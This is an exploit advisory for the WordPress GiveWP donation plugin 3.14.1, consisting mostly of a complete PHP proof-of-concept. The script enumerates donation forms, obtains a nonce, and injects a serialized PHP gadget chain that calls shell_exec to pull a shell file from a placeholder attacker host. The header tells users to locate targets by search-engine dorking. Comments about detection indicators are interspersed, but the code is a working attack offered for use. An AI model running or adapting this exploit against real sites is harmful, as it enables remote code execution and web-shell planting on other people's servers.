WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

=============================================================================================================================================
| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://givewp.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] The following PHP code uploads a shell file from an external link.

[+] Line 78 set your file link.

[+] Line 127. set your target.

[+] save code as poc.php .

[+] Usage : cmd = php poc.php .

[+] PayLoad :

<?php
// PoC client described in the advisory above. Every request it makes is an
// HTTP POST to <target>/wp-admin/admin-ajax.php using a plain PHP stream
// context (see sendRequest). From a detection standpoint the sequence it
// produces is the indicator: action=give_form_search, then
// action=give_donation_form_nonce, then action=give_process_donation whose
// give_title field carries a PHP-serialized object graph (string starting
// with "O:"). A donation title that looks like serialized PHP is never
// legitimate user input and is safe to alert on or reject at the edge.
class GiveWPExploit {
// Base URL of the target site, without trailing slash (see the usage line below).
private $targetUrl;
// Request headers sent with every POST; only Content-Type is set.
private $headers;

// @param string $targetUrl base URL of the WordPress site
public function __construct($targetUrl) {
$this->targetUrl = $targetUrl;
$this->headers = array(
‘Content-Type: application/x-www-form-urlencoded’
);
}

// Step 1: enumerates donation forms via the give_form_search AJAX action.
// Returns the decoded form list on success, false on transport/HTTP error
// or when the decoded response is empty. Note: no authentication is sent,
// so a non-200 or empty answer here is what a hardened site should produce.
public function check() {
$response = $this->sendRequest(‘POST’, $this->targetUrl . ‘/wp-admin/admin-ajax.php’, array(‘action’ => ‘give_form_search’));
if (!$response || $response[‘http_code’] != 200) {
echo “Failed to retrieve form list.\n”;
return false;
}

// Assumes the body is a JSON array of objects each carrying an "id" key — not verified here.
$forms = json_decode($response[‘body’], true);
if (empty($forms)) {
echo “No forms found.\n”;
return false;
}

echo “Successfully retrieved form list. Available Form IDs: ” . implode(‘, ‘, array_column($forms, ‘id’)) . “\n”;
return $forms;
}

// Orchestrates the three steps: enumerate forms, fetch a nonce for a
// randomly chosen form, then submit the donation request. Returns nothing;
// progress is only reported via echo.
public function exploit() {
$forms = $this->check();
if (!$forms) {
return;
}

// array_rand picks one form at random; any form id would serve the same purpose.
$selectedForm = $forms[array_rand($forms)];
$validForm = $this->retrieveAndAnalyzeForm($selectedForm[‘id’]);

if (!$validForm) {
echo “Failed to retrieve a valid form for exploitation.\n”;
return;
}

echo “Using Form ID: ” . $validForm[‘give_form_id’] . ” for exploitation.\n”;
$this->sendExploitRequest($validForm);
}

// Step 2: asks the give_donation_form_nonce AJAX action for a form nonce.
// The nonce is read from the "data" member of the JSON reply; price id and
// amount are fixed defaults. Returns the assembled field array, or false
// when the request fails or no nonce comes back.
// @param mixed $formId form id taken from the check() result
private function retrieveAndAnalyzeForm($formId) {
$response = $this->sendRequest(‘POST’, $this->targetUrl . ‘/wp-admin/admin-ajax.php’, array(
‘action’ => ‘give_donation_form_nonce’,
‘give_form_id’ => $formId
));

if (!$response || $response[‘http_code’] != 200) {
return false;
}

$formData = json_decode($response[‘body’], true);
$giveFormId = $formId;
// Emits a PHP notice if "data" is absent; the !$giveFormHash check below then returns false.
$giveFormHash = $formData[‘data’];
$givePriceId = ‘0’; // Default price ID
$giveAmount = ‘$10.00’; // Default amount

if (!$giveFormHash) {
return false;
}

return array(
‘give_form_id’ => $giveFormId,
‘give_form_hash’ => $giveFormHash,
‘give_price_id’ => $givePriceId,
‘give_amount’ => $giveAmount
);
}

// Step 3: submits give_process_donation with the serialized object graph
// in give_title. The URL below is an operator-supplied placeholder, not a
// real host. Mitigation on the receiving side: run a GiveWP release the
// vendor marks as fixed for this issue, and treat any give_title value that
// begins with "O:" / "a:" (serialized PHP) as an attack indicator.
// @param array $validForm fields returned by retrieveAndAnalyzeForm()
private function sendExploitRequest($validForm) {
// URL of the malicious file to be fetched
$remoteFileUrl = ‘http://attacker-server.com/malicious-file.php’;

// Payload that uses file_get_contents to fetch the remote file
// sprintf fills in the byte length and value of $remoteFileUrl; strlen (bytes) is
// the correct measure here because PHP serialization counts bytes, not characters.
$payload = sprintf(
‘O:19:”Stripe\\\\StripeObject”:1:{s:10:”\\0*\\0_values”;a:1:{s:3:”foo”;O:62:”Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData”:1:{s:8:”userInfo”;a:1:{s:7:”address”;O:4:”Give”:1:{s:12:”\\0*\\0container”;O:33:”Give\\\\Vendors\\\\Faker\\\\ValidGenerator”:3:{s:10:”shell_exec”;s:12:”\\0*\\0generator”;O:34:”Give\\\\Onboarding\\\\SettingsRepository”:1:{s:11:”\\0*\\0settings”;a:1:{s:8:”address1″;s:%d:”%s”;}}}}}}}}’,
strlen($remoteFileUrl),
$remoteFileUrl
);

// Ordinary-looking donation fields; only give_title carries the payload,
// which is what makes field-level logging of this action worthwhile.
$data = array(
‘give-form-id’ => $validForm[‘give_form_id’],
‘give-form-hash’ => $validForm[‘give_form_hash’],
‘give-price-id’ => $validForm[‘give_price_id’],
‘give-amount’ => $validForm[‘give_amount’],
‘give_first’ => ‘Test’,
‘give_last’ => ‘User’,
‘give_email’ => ‘[email protected]’,
‘give_title’ => $payload,
‘give-gateway’ => ‘offline’,
‘action’ => ‘give_process_donation’
);

// Response is discarded; success is not verified by this PoC.
$this->sendRequest(‘POST’, $this->targetUrl . ‘/wp-admin/admin-ajax.php’, $data);
}

// Minimal HTTP client over file_get_contents with a stream context.
// Returns false when the transport fails, otherwise an array with
// ‘http_code’ (parsed from the first status line) and ‘body’.
// No TLS verification options are set, and redirects follow PHP defaults.
// @param string $method HTTP method placed in the stream context
// @param string $url    absolute URL
// @param array  $data   form fields, url-encoded by http_build_query
private function sendRequest($method, $url, $data) {
$options = array(
‘http’ => array(
‘method’ => $method,
‘header’ => implode(“\r\n”, $this->headers),
‘content’ => http_build_query($data)
)
);

$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);

if ($result === false) {
return false;
}

// $http_response_header is populated by PHP in this function's scope after the
// call above; offset 9 assumes a status line of the form "HTTP/1.x NNN ...".
return array(
‘http_code’ => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code
‘body’ => $result
);
}
}

// Usage
// Entry point: the published PoC points at the loopback address; the
// advisory header says this is the value to replace with the target.
$exploit = new GiveWPExploit(‘http://127.0.0.1’);
$exploit->exploit();
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================